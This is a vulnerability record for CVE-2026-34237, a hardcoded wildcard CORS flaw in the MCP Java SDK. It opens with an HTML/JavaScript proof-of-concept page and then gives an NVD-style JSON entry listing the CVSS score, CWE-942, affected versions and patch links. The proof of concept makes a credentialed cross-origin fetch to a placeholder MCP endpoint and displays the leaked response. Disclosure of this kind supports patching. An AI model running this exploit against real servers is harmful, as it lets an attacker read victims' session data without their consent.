CVE-2026-34237

<!-- PoC for CVE-2026-34237: Hardcoded Wildcard CORS Vulnerability This script attempts to fetch data from a vulnerable MCP Java SDK server. --> <!DOCTYPE html> <html> <head> <title>CVE-2026-34237 PoC</title> </head> <body> <h2>Testing CORS Misconfiguration</h2> <script> // Replace with the actual target URL of the vulnerable MCP SDK endpoint var targetUrl = 'http://vulnerable-server:8080/sse'; fetch(targetUrl, { method: 'GET', credentials: 'include' // Include cookies if available }) .then(response => { if (response.ok) { return response.text(); } throw new Error('Network response was not ok.'); }) .then(data => { console.log('CORS Exploit Successful! Data received:'); console.log(data); alert('Data leaked: ' + data.substring(0, 100) + '...'); }) .catch(error => { console.error('Exploit failed:', error); alert('Exploit failed. Check console for details.'); }); </script> </body> </html>

{"cve": {"id": "CVE-2026-34237", "sourceIdentifier": "[email protected]", "published": "2026-03-31T16:16:32.923", "lastModified": "2026-04-03T14:29:40.640", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MCP Java SDK is the official Java SDK for Model Context Protocol servers and clients. Prior to versions 1.0.1 and 1.1.1, there is a hardcoded wildcard CORS vulnerability. This issue has been patched in versions 1.0.1 and 1.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-942"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lfprojects:mcp_java_sdk:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.0.1", "matchCriteriaId": "25694CAC-2051-4746-9F09-053F94A30507"}, {"vulnerable": true, "criteria": "cpe:2.3:a:lfprojects:mcp_java_sdk:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5E0E201B-2A7F-49EE-A48E-6FF7D1AD3A7B"}]}]}], "references": [{"url": "https://github.com/modelcontextprotocol/java-sdk/blob/main/mcp-core/src/main/java/io/modelcontextprotocol/server/transport/HttpServletSseServerTransportProvider.java#L289", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/modelcontextprotocol/java-sdk/blob/main/mcp-core/src/main/java/io/modelcontextprotocol/server/transport/HttpServletStreamableServerTransportProvider.java#L525", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/modelcontextprotocol/java-sdk/security/advisories/GHSA-hv2w-8mjj-jw22", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}